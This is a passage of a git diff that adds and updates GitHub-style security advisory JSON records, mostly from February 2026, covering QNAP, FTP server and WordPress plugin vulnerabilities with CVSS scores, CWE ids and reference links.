+++++++++++++ .../GHSA-gcmq-wqmm-m5gf.json | 48 +++++++++++++++++ .../GHSA-gcpq-mrgg-v5f3.json | 52 +++++++++++++++++++ .../GHSA-h33h-3xrc-r94p.json | 40 ++++++++++++++ .../GHSA-h3fv-27fp-2c8j.json | 36 +++++++++++++ .../GHSA-h7qq-mch4-gjx3.json | 36 +++++++++++++ .../GHSA-j7v8-xc2j-g5q6.json | 36 +++++++++++++ .../GHSA-jg28-4x4g-x78q.json | 48 +++++++++++++++++ .../GHSA-jwg7-4hhr-69vp.json | 36 +++++++++++++ .../GHSA-m5h7-v442-fv53.json | 36 +++++++++++++ .../GHSA-mcfq-f994-8hqg.json | 36 +++++++++++++ .../GHSA-p866-9g89-mc5v.json | 36 +++++++++++++ .../GHSA-p94w-qfcw-pq69.json | 36 +++++++++++++ .../GHSA-pc33-gmp7-wv52.json | 36 +++++++++++++ .../GHSA-pjf9-xcq9-w388.json | 36 +++++++++++++ .../GHSA-q438-w288-p457.json | 48 +++++++++++++++++ .../GHSA-q466-5h8j-2h26.json | 36 +++++++++++++ .../GHSA-q5vh-ff4q-5j62.json | 36 +++++++++++++ .../GHSA-qhpc-j29f-q7jq.json | 36 +++++++++++++ .../GHSA-qphx-26ch-3x8j.json | 36 +++++++++++++ .../GHSA-r36r-8jrx-92cq.json | 36 +++++++++++++ .../GHSA-rccq-h9rv-fmqp.json | 36 +++++++++++++ .../GHSA-rfv8-2g5x-rm48.json | 36 +++++++++++++ .../GHSA-rghx-3352-87pf.json | 36 +++++++++++++ .../GHSA-rq5p-55rh-7hgc.json | 36 +++++++++++++ .../GHSA-rx9j-2fmr-2gqf.json | 48 +++++++++++++++++ .../GHSA-v99r-49f4-6c26.json | 36 +++++++++++++ .../GHSA-vf98-8xxx-fp8w.json | 36 +++++++++++++ .../GHSA-vjxh-723c-34mp.json | 36 +++++++++++++ .../GHSA-vphr-3gfg-4g86.json | 36 +++++++++++++ .../GHSA-w44h-2j78-hvfm.json | 36 +++++++++++++ .../GHSA-w669-772h-5fh5.json | 36 +++++++++++++ .../GHSA-w6g5-6qxq-f96f.json | 36 +++++++++++++ .../GHSA-wcq7-39gh-x6jv.json | 36 +++++++++++++ .../GHSA-x4qx-g5c7-vgmf.json | 36 +++++++++++++ .../GHSA-x522-cqqg-xqx7.json | 48 +++++++++++++++++ .../GHSA-x6mf-6c4h-p75j.json | 36 +++++++++++++ .../GHSA-xmr6-mm5f-8mf2.json | 36 +++++++++++++ 90 files changed, 3226 insertions(+), 6 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-36h4-32cj-m84w/GHSA-36h4-32cj-m84w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-36x3-gg5m-4wjp/GHSA-36x3-gg5m-4wjp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-39q6-v89p-42vg/GHSA-39q6-v89p-42vg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3q2x-q945-c5mm/GHSA-3q2x-q945-c5mm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3rgq-74p3-8xc5/GHSA-3rgq-74p3-8xc5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3v9p-vgm5-cgm3/GHSA-3v9p-vgm5-cgm3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3wh2-2wc5-f45w/GHSA-3wh2-2wc5-f45w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3x5q-gxp5-wv27/GHSA-3x5q-gxp5-wv27.json create mode 100644 advisories/unreviewed/2026/02/GHSA-45q5-pv8q-m46g/GHSA-45q5-pv8q-m46g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4chc-49pc-wcqq/GHSA-4chc-49pc-wcqq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4r22-3675-4h3p/GHSA-4r22-3675-4h3p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4rf7-qgf8-847c/GHSA-4rf7-qgf8-847c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-59g4-3crj-9w92/GHSA-59g4-3crj-9w92.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5cc2-fh28-2crw/GHSA-5cc2-fh28-2crw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-673q-8hc3-p8qm/GHSA-673q-8hc3-p8qm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-67mv-4hj2-xp3g/GHSA-67mv-4hj2-xp3g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-682g-84mv-mcxh/GHSA-682g-84mv-mcxh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6mvg-6pj4-7q9q/GHSA-6mvg-6pj4-7q9q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7369-4q85-89cw/GHSA-7369-4q85-89cw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-76mg-x9r8-w496/GHSA-76mg-x9r8-w496.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7gxv-gvrv-j982/GHSA-7gxv-gvrv-j982.json create mode 100644 advisories/unreviewed/2026/02/GHSA-87q4-v2f4-jh82/GHSA-87q4-v2f4-jh82.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8863-jvcv-whf3/GHSA-8863-jvcv-whf3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8fjj-5wqp-475m/GHSA-8fjj-5wqp-475m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8v4p-4wrw-v43w/GHSA-8v4p-4wrw-v43w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9278-6hcj-2p4j/GHSA-9278-6hcj-2p4j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-92hq-qvrx-74gm/GHSA-92hq-qvrx-74gm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-93qw-26xw-p89x/GHSA-93qw-26xw-p89x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9cqh-c6j9-hwfw/GHSA-9cqh-c6j9-hwfw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9q6f-339m-42fv/GHSA-9q6f-339m-42fv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9qqr-wpm4-gqc3/GHSA-9qqr-wpm4-gqc3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9vw9-245h-4g2j/GHSA-9vw9-245h-4g2j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9wvg-f2jp-vhcf/GHSA-9wvg-f2jp-vhcf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cj2c-wh4j-hw39/GHSA-cj2c-wh4j-hw39.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cp3m-5wf6-4649/GHSA-cp3m-5wf6-4649.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f688-gwj3-8h54/GHSA-f688-gwj3-8h54.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fmj5-jwwm-6cm2/GHSA-fmj5-jwwm-6cm2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fmmr-xg7j-x2cq/GHSA-fmmr-xg7j-x2cq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fmxw-gfwm-67w3/GHSA-fmxw-gfwm-67w3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-frff-9f6h-44cx/GHSA-frff-9f6h-44cx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fxh5-4p4v-76pm/GHSA-fxh5-4p4v-76pm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g4c6-xx88-2hqq/GHSA-g4c6-xx88-2hqq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g4hh-hm34-58p5/GHSA-g4hh-hm34-58p5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g4r6-4jg4-9556/GHSA-g4r6-4jg4-9556.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g4xh-r45m-435w/GHSA-g4xh-r45m-435w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g7hj-9w6f-45m2/GHSA-g7hj-9w6f-45m2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g94q-pfx9-4w8h/GHSA-g94q-pfx9-4w8h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gcmq-wqmm-m5gf/GHSA-gcmq-wqmm-m5gf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gcpq-mrgg-v5f3/GHSA-gcpq-mrgg-v5f3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h33h-3xrc-r94p/GHSA-h33h-3xrc-r94p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h3fv-27fp-2c8j/GHSA-h3fv-27fp-2c8j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h7qq-mch4-gjx3/GHSA-h7qq-mch4-gjx3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j7v8-xc2j-g5q6/GHSA-j7v8-xc2j-g5q6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jg28-4x4g-x78q/GHSA-jg28-4x4g-x78q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jwg7-4hhr-69vp/GHSA-jwg7-4hhr-69vp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m5h7-v442-fv53/GHSA-m5h7-v442-fv53.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mcfq-f994-8hqg/GHSA-mcfq-f994-8hqg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p866-9g89-mc5v/GHSA-p866-9g89-mc5v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p94w-qfcw-pq69/GHSA-p94w-qfcw-pq69.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pc33-gmp7-wv52/GHSA-pc33-gmp7-wv52.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pjf9-xcq9-w388/GHSA-pjf9-xcq9-w388.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q438-w288-p457/GHSA-q438-w288-p457.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q466-5h8j-2h26/GHSA-q466-5h8j-2h26.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q5vh-ff4q-5j62/GHSA-q5vh-ff4q-5j62.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qhpc-j29f-q7jq/GHSA-qhpc-j29f-q7jq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qphx-26ch-3x8j/GHSA-qphx-26ch-3x8j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r36r-8jrx-92cq/GHSA-r36r-8jrx-92cq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rccq-h9rv-fmqp/GHSA-rccq-h9rv-fmqp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rfv8-2g5x-rm48/GHSA-rfv8-2g5x-rm48.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rghx-3352-87pf/GHSA-rghx-3352-87pf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rq5p-55rh-7hgc/GHSA-rq5p-55rh-7hgc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rx9j-2fmr-2gqf/GHSA-rx9j-2fmr-2gqf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v99r-49f4-6c26/GHSA-v99r-49f4-6c26.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vf98-8xxx-fp8w/GHSA-vf98-8xxx-fp8w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vjxh-723c-34mp/GHSA-vjxh-723c-34mp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vphr-3gfg-4g86/GHSA-vphr-3gfg-4g86.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w44h-2j78-hvfm/GHSA-w44h-2j78-hvfm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w669-772h-5fh5/GHSA-w669-772h-5fh5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w6g5-6qxq-f96f/GHSA-w6g5-6qxq-f96f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wcq7-39gh-x6jv/GHSA-wcq7-39gh-x6jv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x4qx-g5c7-vgmf/GHSA-x4qx-g5c7-vgmf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x522-cqqg-xqx7/GHSA-x522-cqqg-xqx7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x6mf-6c4h-p75j/GHSA-x6mf-6c4h-p75j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xmr6-mm5f-8mf2/GHSA-xmr6-mm5f-8mf2.json diff --git a/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json b/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json index c561cfa14aefd..cc4fc102d8088 100644 --- a/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json +++ b/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v6c5-9mp4-mwq4", - "modified": "2026-02-11T06:30:40Z", + "modified": "2026-02-11T15:30:21Z", "published": "2025-11-26T15:34:12Z", "aliases": [ "CVE-2025-13601" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-13601" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2563" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2485" diff --git a/advisories/unreviewed/2025/12/GHSA-hrx4-rccm-xj6c/GHSA-hrx4-rccm-xj6c.json b/advisories/unreviewed/2025/12/GHSA-hrx4-rccm-xj6c/GHSA-hrx4-rccm-xj6c.json index a87c6f50c192a..a48df1eb9f4e5 100644 --- a/advisories/unreviewed/2025/12/GHSA-hrx4-rccm-xj6c/GHSA-hrx4-rccm-xj6c.json +++ b/advisories/unreviewed/2025/12/GHSA-hrx4-rccm-xj6c/GHSA-hrx4-rccm-xj6c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hrx4-rccm-xj6c", - "modified": "2026-02-10T21:31:26Z", + "modified": "2026-02-11T15:30:21Z", "published": "2025-12-05T18:31:11Z", "aliases": [ "CVE-2025-14104" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2485" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2563" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-14104" diff --git a/advisories/unreviewed/2025/12/GHSA-vjm9-gq46-wc5j/GHSA-vjm9-gq46-wc5j.json b/advisories/unreviewed/2025/12/GHSA-vjm9-gq46-wc5j/GHSA-vjm9-gq46-wc5j.json index 2abdaaa8a39ad..aaa0b36ded5e6 100644 --- a/advisories/unreviewed/2025/12/GHSA-vjm9-gq46-wc5j/GHSA-vjm9-gq46-wc5j.json +++ b/advisories/unreviewed/2025/12/GHSA-vjm9-gq46-wc5j/GHSA-vjm9-gq46-wc5j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vjm9-gq46-wc5j", - "modified": "2026-01-22T18:30:29Z", + "modified": "2026-02-11T15:30:21Z", "published": "2025-12-18T18:30:30Z", "aliases": [ "CVE-2025-63386" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-63386" }, + { + "type": "WEB", + "url": "https://github.com/langgenius/dify/pull/32224" + }, { "type": "WEB", "url": "https://gist.github.com/Cristliu/1610daac87c711ac3e0250c58f5cc4f9" diff --git a/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json b/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json index c60a2fec17678..e9e4d6c1a5c7e 100644 --- a/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json +++ b/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8x3f-4jvw-ww73", - "modified": "2026-02-11T12:30:21Z", + "modified": "2026-02-11T15:30:21Z", "published": "2026-01-08T15:31:25Z", "aliases": [ "CVE-2026-0719" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2514" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2513" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2512" diff --git a/advisories/unreviewed/2026/02/GHSA-36h4-32cj-m84w/GHSA-36h4-32cj-m84w.json b/advisories/unreviewed/2026/02/GHSA-36h4-32cj-m84w/GHSA-36h4-32cj-m84w.json new file mode 100644 index 0000000000000..b6f78c5f438e7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-36h4-32cj-m84w/GHSA-36h4-32cj-m84w.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-36h4-32cj-m84w", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-48725" + ], + "details": "A buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQuTS hero h5.3.2.3354 build 20251225 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48725" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-08" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-36x3-gg5m-4wjp/GHSA-36x3-gg5m-4wjp.json b/advisories/unreviewed/2026/02/GHSA-36x3-gg5m-4wjp/GHSA-36x3-gg5m-4wjp.json new file mode 100644 index 0000000000000..1d8066bc5efab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-36x3-gg5m-4wjp/GHSA-36x3-gg5m-4wjp.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-36x3-gg5m-4wjp", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2019-25306" + ], + "details": "BlackMoon FTP Server 3.1.2.1731 contains an unquoted service path vulnerability that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted binary path in the service configuration to insert malicious code that would execute with LocalSystem account permissions during service startup.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25306" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47521" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/blackmoon-ftp-server-bmftp-release-unquoted-serive-path" + }, + { + "type": "WEB", + "url": "http://www.tucows.com/preview/222822/BlackMoon-FTP-Server?q=FTP+server" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-428" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-39q6-v89p-42vg/GHSA-39q6-v89p-42vg.json b/advisories/unreviewed/2026/02/GHSA-39q6-v89p-42vg/GHSA-39q6-v89p-42vg.json new file mode 100644 index 0000000000000..b5c86dbfa90f8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-39q6-v89p-42vg/GHSA-39q6-v89p-42vg.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-39q6-v89p-42vg", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54149" + ], + "details": "An uncontrolled resource consumption vulnerability has been reported to affect Qsync Central. If a local attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54149" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3q2x-q945-c5mm/GHSA-3q2x-q945-c5mm.json b/advisories/unreviewed/2026/02/GHSA-3q2x-q945-c5mm/GHSA-3q2x-q945-c5mm.json new file mode 100644 index 0000000000000..54661722df369 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3q2x-q945-c5mm/GHSA-3q2x-q945-c5mm.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3q2x-q945-c5mm", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2019-25314" + ], + "details": "Duplicate-Post WordPress Plugin 3.2.3 contains a persistent cross-site scripting vulnerability in plugin settings parameters. Attackers can inject malicious scripts into title prefix, suffix, menu order, and blacklist fields to execute arbitrary JavaScript in admin interfaces.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25314" + }, + { + "type": "WEB", + "url": "https://duplicate-post.lopo.it" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/duplicate-post" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47424" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/duplicate-post-persistent-cross-site-scripting" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3rgq-74p3-8xc5/GHSA-3rgq-74p3-8xc5.json b/advisories/unreviewed/2026/02/GHSA-3rgq-74p3-8xc5/GHSA-3rgq-74p3-8xc5.json new file mode 100644 index 0000000000000..495b676285564 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3rgq-74p3-8xc5/GHSA-3rgq-74p3-8xc5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3rgq-74p3-8xc5", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-58466" + ], + "details": "A use of uninitialized variable vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to denial of service conditions, or modify control flow in unexpected ways.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.2.8.3332 build 20251128 and later\nQuTS hero h5.2.8.3321 build 20251117 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58466" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-05" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-457" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3v9p-vgm5-cgm3/GHSA-3v9p-vgm5-cgm3.json b/advisories/unreviewed/2026/02/GHSA-3v9p-vgm5-cgm3/GHSA-3v9p-vgm5-cgm3.json new file mode 100644 index 0000000000000..3d44f0bb9a32e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3v9p-vgm5-cgm3/GHSA-3v9p-vgm5-cgm3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3v9p-vgm5-cgm3", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-57707" + ], + "details": "An improper neutralization of directives in statically saved code ('Static Code Injection') vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to access restricted data / files.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5166 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57707" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-96" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3wh2-2wc5-f45w/GHSA-3wh2-2wc5-f45w.json b/advisories/unreviewed/2026/02/GHSA-3wh2-2wc5-f45w/GHSA-3wh2-2wc5-f45w.json new file mode 100644 index 0000000000000..8c38cffe52a2b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3wh2-2wc5-f45w/GHSA-3wh2-2wc5-f45w.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3wh2-2wc5-f45w", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-66277" + ], + "details": "A link following vulnerability has been reported to affect several QNAP operating system versions. The remote attackers can then exploit the vulnerability to traverse the file system to unintended locations.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.2.8.3350 build 20251216 and later\nQuTS hero h5.3.2.3354 build 20251225 and later\nQuTS hero h5.2.8.3350 build 20251216 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66277" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-05" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3x5q-gxp5-wv27/GHSA-3x5q-gxp5-wv27.json 